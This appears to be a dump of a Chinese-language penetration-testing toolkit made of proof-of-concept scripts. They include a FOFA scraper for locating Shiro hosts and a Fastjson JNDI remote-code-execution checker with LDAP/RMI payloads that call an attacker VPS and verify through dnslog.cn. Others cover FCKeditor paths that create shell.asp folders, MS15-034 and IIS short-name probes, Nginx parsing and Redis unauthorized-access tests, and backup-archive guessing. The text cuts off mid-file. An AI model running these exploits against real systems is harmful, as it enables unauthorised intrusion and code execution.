def fofa(word: str, pag_num: str, num: int = 5) -> None:
    """Fetch up to *num* result pages for *word* and print the unique host links.

    `pag_num` is the page count returned by pag_num_fun and is only used for
    the hint printed when fewer pages were fetched than exist. A page that
    fails to download is skipped; an empty page stops the loop. Nothing is
    returned — results go to stdout only.
    """
    index = 0  # pages actually fetched
    s = (base64.b64encode(word.encode('utf-8'))).decode('utf-8')
    ip_list = []  # all collected host links
    for i in range(1,num+1):
        # fetch the page source
        url = f"https://fofa.info/result?page={i}&qbase64={s}"
        try:
            text = requests.get(url=url,headers=headers,verify=False,timeout=10,cookies={'fofa_token':fofa_token,'refresh_token':refresh_token}).text
        except Exception as error:
            print("fofa函数中,获取页面源码时发生错误,错误所在地为text变量。详细错误为:%s"%type(error))
            continue
        tree = etree.HTML(text)
        # extract all host links from one page
        try:
            r = tree.xpath('//div[@id="__layout"]//div[@class="showListsContainer"]/div[@class="rightListsMain"]//a[@target="_blank"]/@href')
            #title = tree.xpath('//div[@class="contentLeft"]/p[1]/text()')
            #country = tree.xpath('//div[@class="contentLeft"]/p[3]/a[@class="jumpA"]/text()')
        except Exception as error:
            print('fofa函数中,提取页面ip地址时发生错误,错误所在地为r变量。详细错误为:%s'%error)
            return
        if len(r) == 0:
            break
        for m in range(len(r)):
            # only hrefs that contain a scheme separator are kept
            if "//" in r[m]:
                # save the host link to the list
                ip_list.append(r[m])
                #ip_list.append(r[m]+' '+ country[m])
                #ip_list.append(r[m] +' '+ title[m] +' '+ country[m])
            else:
                pass
        index = index + 1
        print(f'[*]第{i}页爬取完毕!')
    ip_list_new = list(set(ip_list))  # deduplicate (order is not preserved)
    if int(pag_num) > index:
        print('[*]提示: 输入登录后的cookie即可获取更多数据哦!')
    print('[+]FOFA收集 %s 页结果如下, 总计 [%s]'%(str(index),len(ip_list_new)))
    for url in ip_list_new:
        print(url)

print("用法: 在目标处输入查询语法,需要编辑源码修改refresh_token (普通用户默认查询5页)")
def check(**kwargs) -> None:
    """Entry point: kwargs['url'] is the query string, not a URL.

    Any exception from the two helpers (including the NameError described in
    pag_num_fun) is reduced to printing its type.
    """
    try:
        pag_num = pag_num_fun(kwargs['url'])
        fofa(kwargs['url'], pag_num)
    except Exception as e:
        print(type(e))

if __name__ == '__main__':
    pag_num = pag_num_fun('app=\"Shiro权限管理系统\"')
    fofa('app=\"Shiro权限管理系统\"', pag_num)

# ===== /POC/Fastjson_RCE.py =====
# Only the header of check() is visible here; the payload tables and the
# request loop continue on the next line of the dump.
import requests,time,re,sys
### test
sys.path.append('../')
from ClassCongregation import Dnslog
#import ClassCongregation
def check(**kwargs):
    url = kwargs['url']
    # VPS ip
    Vurl = kwargs['ip']
    # VPS port
    port = kwargs['port']

    dns_cookie = kwargs['cookie']
    head = {
        "Content-Type":"application/json",
        "User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
    }

    header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36'}
    payload_ldap = {
"1.2.24":"{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://"+ Vurl+":"+port +"/Object\",\"autoCommit\":true}", 22 | "1.2.24_1":"{\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://"+ Vurl+":"+port +":10086/Object\",\"autoCommit\":true}}", 23 | "1.2.47":"{\"a\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://"+ Vurl+":"+port +"/Object\",\"autoCommit\":true}}}", 24 | "1.2.24_2":"{\"fybm3i\": {\"\\u0040type\": \"\\x63o\\u006D\\u002Es\\x75n.\\u0072ows\\u0065\\u0074.Jdbc\\x52\\x6F\\u0077\\x53e\\u0074\\u0049m\\x70l\",\"dataSourceName\": \"ldap://"+ Vurl+":"+port +"/Object\",\"autoCommit\": true}}" 25 | } 26 | 27 | payload_rmi = { 28 | "1.2.24":"{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://"+ Vurl+":"+port +"/Object\",\"autoCommit\":true}", 29 | "1.2.24_1":"{\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://"+ Vurl+":"+port +":10086/Object\",\"autoCommit\":true}}", 30 | "1.2.47":"{\"a\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://"+ Vurl+":"+port +"/Object\",\"autoCommit\":true}}}", 31 | "1.2.24_2":"{\"fybm3i\": {\"\\u0040type\": \"\\x63o\\u006D\\u002Es\\x75n.\\u0072ows\\u0065\\u0074.Jdbc\\x52\\x6F\\u0077\\x53e\\u0074\\u0049m\\x70l\",\"dataSourceName\": \"rmi://"+ Vurl+":"+port +"/Object\",\"autoCommit\": true}}" 32 | } 33 | 34 | payload_other = { 35 | "1":"{\"zeo\":{\"@type\":\"java.net.Inet4Address\",\"val\":\"nnivq5.dnslog.cn\"}}" 36 | } 37 | try: 38 | print('[*]正在利用LDAP测试...') 39 | for poc in payload_ldap: 40 | requests.post(url, headers=head, data=payload_ldap[poc], timeout=15, verify=False) 41 | time.sleep(0.5) 42 | rep1 = requests.get('http://dnslog.cn/getrecords.php', cookies={'PHPSESSID': dns_cookie} , headers=header, timeout=15) 43 | 44 | if 
'dnslog' in rep1.text: 45 | print('[+]target is vulnerable') 46 | print('[+]fastjson version:{}'.format(poc)) 47 | print('[+]poc:{}'.format(payload_ldap[poc])) 48 | return 49 | time.sleep(0.5) 50 | print('[*]正在利用RMI测试...') 51 | for poc in payload_rmi: 52 | requests.post(url, headers=head, data=payload_rmi[poc], timeout=15, verify=False) 53 | time.sleep(0.5) 54 | rep1 = requests.get('http://dnslog.cn/getrecords.php', cookies={'PHPSESSID': dns_cookie} , headers=header, timeout=15) 55 | if 'dnslog' in rep1.text: 56 | print('[+]target is vulnerable') 57 | print('[+]fastjson version:{}'.format(poc)) 58 | print('[+]poc:{}'.format(payload_rmi[poc])) 59 | return 60 | print('[-]target is not vulnerable, or openjdk > 8u102') 61 | except Exception as e: 62 | print("异常对象的内容是%s"%e) 63 | 64 | print("[*]用法:java -cp fastjson_tool.jar fastjson.HLDAPServer 106.12.132.186 10086 \"curl xxx.dnslog.cn\"") 65 | print("[*]用法:cookie中要输入dnslog网站的PHPSESSID") 66 | 67 | 68 | if __name__ == "__main__": 69 | DL=Dnslog() 70 | a = DL.dns_host() 71 | print(a) 72 | if DL.dnslog_cn_dns(): 73 | print('good') 74 | -------------------------------------------------------------------------------- /POC/Fckeditor.py: -------------------------------------------------------------------------------- 1 | import requests,time 2 | from requests.packages import urllib3 3 | from CodeTest import color 4 | urllib3.disable_warnings() 5 | 6 | #敏感信息路径查找 7 | Fck_path_list = 
['/editor/dialog/fck_about.html','/_whatsnew.html','/editor/filemanager/browser/default/connectors/test.html','/editor/filemanager/upload/test.html','/editor/filemanager/connectors/test.html','/editor/filemanager/connectors/uploadtest.html','/_samples/default.html','/_samples/asp/sample01.asp','/_samples/asp/sample02.asp','/_samples/asp/sample03.asp','/_samples/asp/sample04.asp','/editor/.htm','/editor/fckdialog.html','/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/php/connector.php','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/asp/connector.asp','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/aspx/connector.aspx','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/jsp/connector.jsp','/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.Aspx','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php','/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=/shell.asp&NewFolderName=
z.asp','/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684','/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp','/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp','/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=e:/'] 8 | VUL_LIST = [] 9 | 10 | """ 11 | :查找spring敏感路径泄露信息 12 | """ 13 | def spider(urls,time): 14 | """ 15 | :return:VUL_LIST 16 | """ 17 | s = requests.session() 18 | s.trust_env = False 19 | s.verify = False 20 | status_code = None 21 | s.headers = { 22 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 23 | 'Accept-Encoding': 'gzip, deflate, br', 24 | 'Accept-Language': 'zh-CN,zh;q=0.9', 25 | 'Connection': 'close', 26 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36' 27 | } 28 | for path in Fck_path_list: 29 | urls_path = urls + path 30 | #urls = 'http://110.53.243.248:9006/swagger-ui.html' 31 | try: 32 | content = s.get(urls_path, headers=s.headers, timeout=time, allow_redirects=False) 33 | status_code = content.status_code 34 | if status_code != 404: 35 | VUL_LIST.append(path) 36 | color('[+] %s %s'%(urls_path,str(status_code)),'green') 37 | else: 38 | color('[-] %s %s'%(urls_path,str(status_code)),'red') 39 | except Exception as e: 40 | print('[-] 请求 %s 出现异常 %s'%(urls_path,type(e))) 41 | continue 42 | return VUL_LIST 43 | 44 | def check(**kwargs): 45 | try: 46 | urls = kwargs['url']#/*str*/ 47 | urls = urls.strip('/') 48 | VUL_LIST = spider(urls, 3) 49 | 50 | if '/jolokia' in VUL_LIST or '/actuator/jolokia' in VUL_LIST: 51 | 
print('https://github.com/LandGrey/SpringBootVulExploit') 52 | print('0x03:获取被星号脱敏的密码的明文 (方法一)') 53 | print('0x04:jolokia logback JNDI RCE') 54 | print('0x05:jolokia Realm JNDI RCE') 55 | 56 | elif '/env' in VUL_LIST and '/refresh' in VUL_LIST: 57 | print('https://github.com/LandGrey/SpringBootVulExploit') 58 | print('0x04:获取被星号脱敏的密码的明文 (方法二)') 59 | print('0x05:获取被星号脱敏的密码的明文 (方法三)') 60 | print('0x02:spring cloud SnakeYAML RCE') 61 | print('0x03:eureka xstream deserialization RCE') 62 | print('0x06:h2 database query RCE') 63 | print('0x08:mysql jdbc deserialization RCE') 64 | 65 | elif '/heapdump' in VUL_LIST or '/actuator/heapdump' in VUL_LIST: 66 | print('https://github.com/LandGrey/SpringBootVulExploit') 67 | print('0x06:获取被星号脱敏的密码的明文 (方法四)') 68 | else: 69 | print('[-] 未找到相关漏洞信息, 请参阅: https://github.com/LandGrey/SpringBootVulExploit') 70 | #print(VUL_LIST) 71 | return VUL_LIST 72 | except Exception as e: 73 | print('脚本执行出错 %s'%e) 74 | 75 | if __name__ == "__main__": 76 | a = check(**{'url':'http://www.baidu.com'}) 77 | #print(a) 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | -------------------------------------------------------------------------------- /POC/IIS_MS15-034_Range_bytes.py: -------------------------------------------------------------------------------- 1 | try: 2 | import requests 3 | import sys 4 | except ImportError as ierr: 5 | print("Error, looks like you don';t have %s installed", ierr) 6 | 7 | def identify_iis(domain): 8 | req = requests.get(str(domain), verify=False) 9 | remote_server = req.headers['server'] 10 | 11 | if "Microsoft-IIS" in remote_server: 12 | print("[+] 服务是 " + remote_server) 13 | ms15_034_test(str(domain)) 14 | else: 15 | print("[-] 不是IIS\n可能是: " + remote_server) 16 | 17 | def ms15_034_test(domain): 18 | print("[*] 启动vuln检查!") 19 | headers = {"Range":"bytes=0-18446744073709551615"} 20 | #vuln_buffer = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n"; 21 | try: 22 | req = requests.get(str(domain), 
# (continuation of ms15_034_test() from /POC/IIS_MS15-034_Range_bytes.py:
#  the function header and the requests.get(...) call it completes lie on the
#  previous line of the dump)
        headers=headers, verify=False)
        # MS15-034 check: the decision is made purely on whether the phrase
        # appears in the response body, so a server that says so for an
        # unrelated reason is reported as vulnerable. Mitigation is the
        # MS15-034 update; disabling IIS kernel caching was the published
        # interim workaround.
        if "Requested Range Not Satisfiable" in str(req.content):
            print("[+] 存在漏洞")
            return 1
        else:
            print("[-] IIS服务无法显示漏洞是否存在. "+"需要手动检测")
            return
    except Exception as e:
        print('发生错误%s'%e)

print("[*]用法:Range: bytes=0-18446744073709551615")
def check(**kwargs) -> int | None:
    """Entry point: run ms15_034_test on kwargs['url'].

    Returns 1 when the vulnerable marker was seen, otherwise None (both the
    "not shown" branch and a request error return None).
    """
    result = ms15_034_test(kwargs['url'])
    return result
if __name__ == '__main__':
    identify_iis(sys.argv[1])

# ===== /POC/IIS_shortname_Scan.py =====
#!/usr/bin/env python
# encoding:utf-8
# An IIS short_name scanner my[at]lijiejie.com http://www.lijiejie.com


import sys
import http.client
from urllib import parse
import threading
import queue as Queue
import time


class Scanner():
    """Test an IIS host for 8.3 short-name (tilde) disclosure and enumerate names.

    Detection mechanics (is_vul / _scan_worker): the server is treated as
    disclosing short names when a wildcard path that can match an existing
    entry returns 404 while an impossible one does not, and names are then
    grown one character at a time from that 404 differential, up to six
    characters plus a three-character extension.
    Defender's side: disable 8.3 name creation on the NTFS volume
    (NtfsDisable8dot3NameCreation) and reject '~' in request paths at the
    edge; a burst of requests containing '*~1*' from one client (this class
    uses 20 worker threads) is the detection signature.
    """
    def __init__(self, target: str) -> None:
        """Normalise *target* and start the background printer thread.

        NOTE(review): urlparse is applied to the raw `target`, not to the
        normalised `self.target`, so a target given without a scheme gets an
        empty netloc — confirm against callers. `self.lock` is created but
        never used in this file.
        """
        self.target = target.lower()
        if not self.target.startswith('http'):
            self.target = 'http://%s' % self.target
        self.scheme, self.netloc, self.path, params, query, fragment = \
            parse.urlparse(target)
        if self.path[-1:] != '/':    # ends with slash
            self.path += '/'
        self.alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789_-'
        self.files = []
        self.dirs = []
        self.queue = Queue.Queue()
        self.lock = threading.Lock()
        self.threads = []
        self.request_method = ''
        self.msg_queue = Queue.Queue()
        self.STOP_ME = False
        # Non-daemon thread: the process cannot exit until STOP_ME is set.
        threading.Thread(target=self._print).start()

    def _conn(self):
        """Return a new HTTP(S) connection to self.netloc, or None on failure."""
        try:
            if self.scheme == 'https':
                conn = http.client.HTTPSConnection(self.netloc)
            else:
                conn = http.client.HTTPConnection(self.netloc)
            return conn
        except Exception as e:
            print('[_conn.Exception]%s'%e)
            return None

    def _get_status(self, path: str) -> int:
        """Send one request for *path* with self.request_method and return the status.

        Raises a plain Exception wrapping any error, including the
        AttributeError that follows when _conn() returned None. The
        connection is only closed on the success path.
        """
        try:
            conn = self._conn()
            conn.request(self.request_method, path)
            status = conn.getresponse().status
            conn.close()
            return status
        except Exception as e:
            raise Exception('[_get_status.Exception] %s' % str(e) )

    def is_vul(self) -> bool:
        """Return True when the 404 differential is observed for GET or OPTIONS.

        Leaves self.request_method set to the last method tried, which the
        workers then reuse. Raises a plain Exception on request errors, in
        which case the printer thread started in __init__ is left running
        unless the caller sets STOP_ME.
        """
        try:
            for _method in ['GET', 'OPTIONS']:
                self.request_method = _method
                status_1 = self._get_status(self.path + '/*~1*/a.aspx')    # an existed file/folder
                status_2 = self._get_status(self.path + '/l1j1e*~1*/a.aspx')    # not existed file/folder
                if status_1 == 404 and status_2 != 404:
                    return True
            return False
        except Exception as e:
            raise Exception('[is_vul.Exception] %s' % str(e) )

    def run(self) -> None:
        """Seed the work queue with every first character, run 20 workers, wait for them."""
        for c in self.alphanum:
            self.queue.put( (self.path + c, '.*') )    # filename, extension
        for i in range(20):
            t = threading.Thread(target=self._scan_worker)
            self.threads.append(t)
            t.start()
        for t in self.threads:
            t.join()
        # Lets _print drain its queue and exit.
        self.STOP_ME = True

    def report(self) -> None:
        """Print the collected directory and file short names with a summary line."""
        print('-'*64)
        for d in self.dirs:
            print('Dir: %s' % d)
        for f in self.files:
            print('File: %s' % f)
        print('-'*64)
        print('%d Directories, %d Files found in total' % (len(self.dirs), len(self.files)))
        print('Note that * is a wildcard, matches any character zero or more times.')

    def _print(self) -> None:
        """Background printer: drain msg_queue until STOP_ME is set and the queue is empty."""
        while not self.STOP_ME or (not self.msg_queue.empty()):
            if self.msg_queue.empty():
                time.sleep(0.05)
            else:
                print(self.msg_queue.get())

    def _scan_worker(self) -> None:
        """Worker loop: pop (url, ext) candidates and extend the ones that answer 404.

        Stops when the queue has been empty for one second. self.dirs and
        self.files are appended from several threads without taking
        self.lock; list.append itself is atomic in CPython, so this relies
        on that implementation detail.
        """
        while True:
            try:
                url, ext = self.queue.get(timeout=1.0)
                status = self._get_status(url + '*~1' + ext + '/1.aspx')
                if status == 404:
                    self.msg_queue.put('[+] %s~1%s\t[scan in progress]' % (url, ext))

                    if len(url) - len(self.path)< 6:    # enum first 6 chars only
                        for c in self.alphanum:
                            self.queue.put( (url + c, ext) )
                    else:
                        if ext == '.*':
                            self.queue.put( (url, '') )

                        if ext == '':
                            self.dirs.append(url + '~1')
                            self.msg_queue.put('[+] Directory ' + url + '~1\t[Done]')

                        elif len(ext) == 5 or (not ext.endswith('*')):    # .asp*
                            self.files.append(url + '~1' + ext)
                            self.msg_queue.put('[+] File ' + url + '~1' + ext + '\t[Done]')

                        else:
                            for c in 'abcdefghijklmnopqrstuvwxyz0123456789':
                                self.queue.put( (url, ext[:-1] + c + '*') )
                                if len(ext) < 4:    # < len('.as*')
                                    self.queue.put( (url, ext[:-1] + c) )

            except Queue.Empty as e:
                break
            except Exception as e:
                print('[Exception]', e)

print('[*]用法: [URL]')
def check(**kwargs) -> None:
    """Entry point: test kwargs['url'] and, when the differential is seen, enumerate.

    NOTE(review): STOP_ME is only set on the not-vulnerable branch or by
    run(); if is_vul() raises, the printer thread keeps the process alive.
    """
    s = Scanner(kwargs['url'])
    if not s.is_vul():
        s.STOP_ME = True
        print('[-] 目标不存在IIS短文件漏洞')
        #return
    else:
        print('[+] 目标存在IIS短文件漏洞')
        #return 1
        s.run()
        s.report()



if __name__ == '__main__':
    if len(sys.argv) == 1:
        print('Usage: python IIS_shortname_Scan.py http://www.target.com/')
        sys.exit()

    target = sys.argv[1]
    s = Scanner(target)
    if not s.is_vul():
        s.STOP_ME = True
        print('Server is not vulnerable')
        sys.exit(0)

    print('Server is vulnerable, please wait, scanning...')
    s.run()
    s.report()

# ===== /POC/JSencode.py =====
# Runs a JavaScript hashing function (from a bundled JS file) over every
# line of a wordlist by way of the execjs runtime.
#coding:utf-8
import os
import execjs
import threading

# Wordlist and JS file are looked up under ./POC/js_examples/ by Encode.
passfile = "top100password.txt"
jsfile = "md5.js"
# Name of the JS function called for each line.
encode_fun = "hex_md5"


def info() -> None:
    """Print the usage banner; called once at import time below."""
    #os.environ["EXECJS_RUNTIME"] = 'Phantomjs'
    print("[+]============================================================")
    print("[+] Python调用JS加密password文件内容 ")
    print("[+] passfile : 密码字典 ")
    print("[+] jsfile : JS文件 ")
    print("[+] encode_fun : 加密函数 ")
    print("[+]============================================================")
    print(" ")

def Encode(jsfile: str, passfile: str) -> None:
    """Hash every line of *passfile* with *encode_fun* from *jsfile* and print the pairs.

    Both paths are relative to the current working directory
    (./POC/js_examples/), so this only works when run from the repository
    root. Sets EXECJS_RUNTIME for the whole process as a side effect.
    NOTE(review): the bare `except:` also swallows KeyboardInterrupt and
    SystemExit; `except Exception:` would be the narrowest safe catch here.
    """
    os.environ["EXECJS_RUNTIME"] = 'Phantomjs'
    jsfile = './POC/js_examples/' + jsfile
    passfile = './POC/js_examples/' + passfile
    #jsfile = './js_examples/' + jsfile
    #passfile = './js_examples/' + passfile
    print("[+] 正在进行加密,请稍后......")
    with open (jsfile,'r') as strjs:
        src = strjs.read()
    #phantom = execjs.get('PhantomJS') # JS runtime
    #getpass = phantom.compile(src) # compile the JS
    getpass = execjs.compile(src)
    with open(passfile, 'r') as strpass:
        # readlines() loads the whole wordlist into memory first.
        for passwd in strpass.readlines():
            try:
                passwd = passwd.strip()
                mypass = getpass.call(encode_fun, passwd)  # pass the argument
                print("[+] %s 加密完成: %s"%(passwd,mypass))
            except:
                print("[-] %s 加密失败"%passwd)
                continue
    print("[+] 加密完成")

# Encode a single password.
def passstring(jsfile: str, password: str) -> None:
    """Hash one *password* with *encode_fun* from *jsfile* and print the result.

    Not called by check(). Unlike Encode it takes *jsfile* as given (no
    ./POC/js_examples/ prefix) and obtains the runtime via
    execjs.get('PhantomJS') explicitly.
    """
    print("[+] 正在进行加密,请稍后......")
    with open (jsfile,'r') as strjs:
        src = strjs.read()
    phantom = execjs.get('PhantomJS')  # JS runtime
    getpass = phantom.compile(src)  # compile the JS
    mypass = getpass.call(encode_fun, password)  # pass the argument
    print("[+] 加密完成:{}".format(mypass))

info()
def check(**kwargs) -> None:
    """Entry point: start Encode(jsfile, passfile) on a non-daemon thread and return.

    kwargs is ignored; the thread is neither joined nor returned, so the
    caller cannot wait for or observe completion.
    """
    t = threading.Thread(target=Encode, args=(jsfile, passfile))
    t.start()

if __name__ == "__main__":
    check(**{"1":"1"})

# ===== /POC/Nginx_iis_scan.py =====
# Only the module header and the first two lines of Nginx_iis_scan() are
# visible; the function continues beyond the end of this dump.
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import requests
import urllib3
import threading
import queue
import sys,getopt
sys.path.append('../')
from ClassCongregation import _urlparse

error=20  # tolerance (5~10); no need to change, already tuned
urllib3.disable_warnings()

def Nginx_iis_scan(url):
    try:
        path = '/.php'
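# (continuation of Nginx_iis_scan(url): `try:` and `path = '/.php'` are in the previous chunk)
        path2 = '/.232index'    # control suffix: not PHP, so a parsing bug should not change the response
        res = requests.get(url=url + path, verify=False, timeout=5)
        count = len(res.text)
        if res.status_code == 200:
            res2 = requests.get(url=url + path2, verify=False, timeout=5)
            count2 = len(res2.text)
            delta = count - count2
            # Heuristic: if appending '/.php' changes the body size by more than
            # `error` bytes compared with the control suffix, the static file was
            # handed to the PHP handler.
            if error >= abs(delta):
                print(url + path2 + ' No Loophole')
            else:
                print(url + ' 确定存在解析漏洞')
                return True
        else:
            print(url + path + ' ' + str(res.status_code))
    except Exception as e:
        print(url, str(e))
    return None


print('[*]请输入目标服务器上存在的静态资源文件链接,如 http://www.baidu.com/robots.txt')


def check(**kwargs):
    """Harness entry point; returns True when Nginx_iis_scan() flags the target."""
    return Nginx_iis_scan(kwargs['url'])


if __name__ == "__main__":
    Nginx_iis_scan(_urlparse("http://baidu.com/123.php"))
    print('task complete~~~~~~~~~~ 完了')


# ===== /POC/Redis_unauthorized_access.py =====
#!/usr/bin/python

import socket

vuln = ['redis', '6379']

# RESP encoding of the single-word command INFO: "*1\r\n$4\r\ninfo\r\n".
_INFO_COMMAND = b'\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'

print('[*]Usage: [IP]')


def check(**kwargs):
    """Send INFO to kwargs['ip'] (port kwargs.get('port', 6379)) without AUTH.

    A reply containing "redis_version" means the instance answers commands
    unauthenticated.  An instance with requirepass answers -NOAUTH and one in
    protected mode answers -DENIED; both are reported as not vulnerable.
    Connection or timeout errors are printed instead of silently swallowed.
    Returns 1 when vulnerable, None otherwise.
    """
    ip = kwargs['ip']
    port = int(kwargs.get('port', 6379))
    try:
        with socket.create_connection((ip, port), timeout=5) as conn:
            conn.sendall(_INFO_COMMAND)
            data = conn.recv(1024)
    except OSError as e:    # socket.timeout is an OSError subclass
        print('[-]%s:%d %s' % (ip, port, e))
        return None
    if b"redis_version" in data:
        print('[+]%d Redis Unauthorized Access' % port)
        return 1
    print('[-]target is not vulnerable')
    return None


# ===== /POC/Scan_zip.py =====
import urllib.parse
import requests
import time
from bs4 import BeautifulSoup

headers = {"Range": "bytes=0-4999"}    # download at most the first 5 KB of a hit

YEARS = ["2018", "2019", "2020", "2021"]
EXTENSIONS = [".zip", ".rar"]


def _date_suffixes():
    """Every MMDD from 0101 to 1231 with days 01..31 for all months (372 values).

    Impossible dates (0230, 0431, ...) are kept on purpose: the original
    hard-coded list contained them, and each costs only one extra request.
    """
    return ['%02d%02d' % (m, d) for m in range(1, 13) for d in range(1, 32)]


def _page_title(root_url):
    """Return the <title> of *root_url*, decoded with the Content-Type charset (gb2312 if absent)."""
    req = requests.get(root_url, timeout=1, headers=headers)
    content_type_header = req.headers['content-type']
    charset = content_type_header.split('=')[1] if '=' in content_type_header else "gb2312"
    soup = BeautifulSoup(req.text, 'lxml')
    return soup.title.string.encode(charset, errors='ignore').decode(charset)


def check(**kwargs):
    """Guess backup archives named `<title><year><MMDD>.zip|.rar` under the site root.

    kwargs: url (required); years / exts optionally override YEARS / EXTENSIONS.
    Each candidate is fetched with a 5 KB Range.  200/206 is a hit ([+]), 404 is
    absent ([-]), any other status or a transport error is [?].  The original
    printed every non-404 as "[?]", so real hits were indistinguishable from
    timeouts.  A site that answers 200 for any path (soft 404) will flag every
    name — confirm a [+] by hand.  Returns the list of hit URLs, or None when
    the title could not be fetched.
    """
    root_url = kwargs['url'].strip('/')
    try:
        system = _page_title(root_url)
    except Exception:
        print('[-] 无法获取系统title')
        return None
    system = urllib.parse.quote(system)
    hits = []
    for y in kwargs.get('years', YEARS):
        print("%s年:" % y)
        for d in _date_suffixes():
            for e in kwargs.get('exts', EXTENSIONS):
                url = root_url + '/' + system + y + d + e
                try:
                    resp = requests.get(url, timeout=1, headers=headers)
                except Exception:
                    print("[?]" + url + ": " + "?")
                    continue
                if resp.status_code == 404:
                    print("[-] " + url + ": " + str(resp.status_code))
                elif resp.status_code in (200, 206):
                    print("[+] " + url + ": " + str(resp.status_code))
                    hits.append(url)
                else:
                    print("[?]" + url + ": " + str(resp.status_code))
    return hits


# ===== /POC/Swagger-exp.py =====
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Swagger REST API Exploit
# By LiJieJie  my[at]lijiejie.com

import requests
import json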
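import time
from urllib.parse import urlparse
from ClassCongregation import color

requests.packages.urllib3.disable_warnings()
api_set_list = []    # every swagger.json URL discovered for the current target
scheme = 'http'      # scheme used to rebuild base URLs; set per target by check()
headers = {'User-Agent': 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'}
auth_bypass_detected = False
TIMEOUT = 10    # seconds; the original sent every request without a timeout and could hang a batch scan

SENSITIVE_WORDS = ('url', 'path', 'uri')    # parameter names worth a manual SSRF / traversal look
SENSITIVE_URL = ('delete',)                 # operations never invoked automatically
# Dummy values substituted for the placeholders produced by process_doc(); order matters
# because '=string' must be handled after '*string*'.
PLACEHOLDERS = (
    ('*string*', 'a'),
    ('*int64*', '1'),
    ('*int32*', '1'),
    ('=string', '=test'),
    ('*number*', '1'),
    ('*date-time*', '20211104'),
    ('*boolean*', 'false'),
)


def print_msg(msg, colors='black'):
    """Print *msg* with a HH:MM:SS prefix through the project's color() helper."""
    color('[%s] %s' % (time.strftime('%H:%M:%S', time.localtime()), msg), colors)


def find_all_api_set(start_url):
    """Collect swagger.json URLs into api_set_list, starting from *start_url*.

    A body starting with {"swagger":" is a document itself (saved verbatim to
    ./data/api-docs.json, overwritten per call); a /swagger-resources/ listing
    ("swaggerVersion") is followed recursively through each item's location.
    Errors are printed, never raised.
    """
    try:
        text = requests.get(start_url, headers=headers, verify=False, timeout=TIMEOUT).text
        if text.strip().startswith('{"swagger":"'):
            api_set_list.append(start_url)
            print_msg('[OK] [API set] %s' % start_url)
            with open('./data/api-docs.json', 'w', encoding='utf-8') as f:
                f.write(text)
        elif text.find('"swaggerVersion"') > 0:
            base_url = start_url[:start_url.find('/swagger-resources')]
            for item in json.loads(text):
                find_all_api_set(base_url + item['location'])
        else:
            print_msg('[FAIL] Invalid API Doc: %s' % start_url)
    except Exception as e:
        print_msg('[find_all_api_set] process error %s' % e)


def _describe_param(parameter):
    """Return the type placeholder for one Swagger parameter (format, schema type, or {OBJECT_<ref>})."""
    if 'format' in parameter:
        return parameter['format']
    schema = parameter.get('schema')
    if isinstance(schema, dict):
        if 'format' in schema:
            return schema['format']
        if 'type' in schema:
            return schema['type']
        if '$ref' in schema:
            return '{OBJECT_%s}' % schema['$ref'].replace('#/definitions/', '')
    return parameter['type'] if 'type' in parameter else 'unkonwn'


def process_doc(url):
    """Fetch one Swagger 2.0 document and call scan_api() for every GET/POST/PUT operation.

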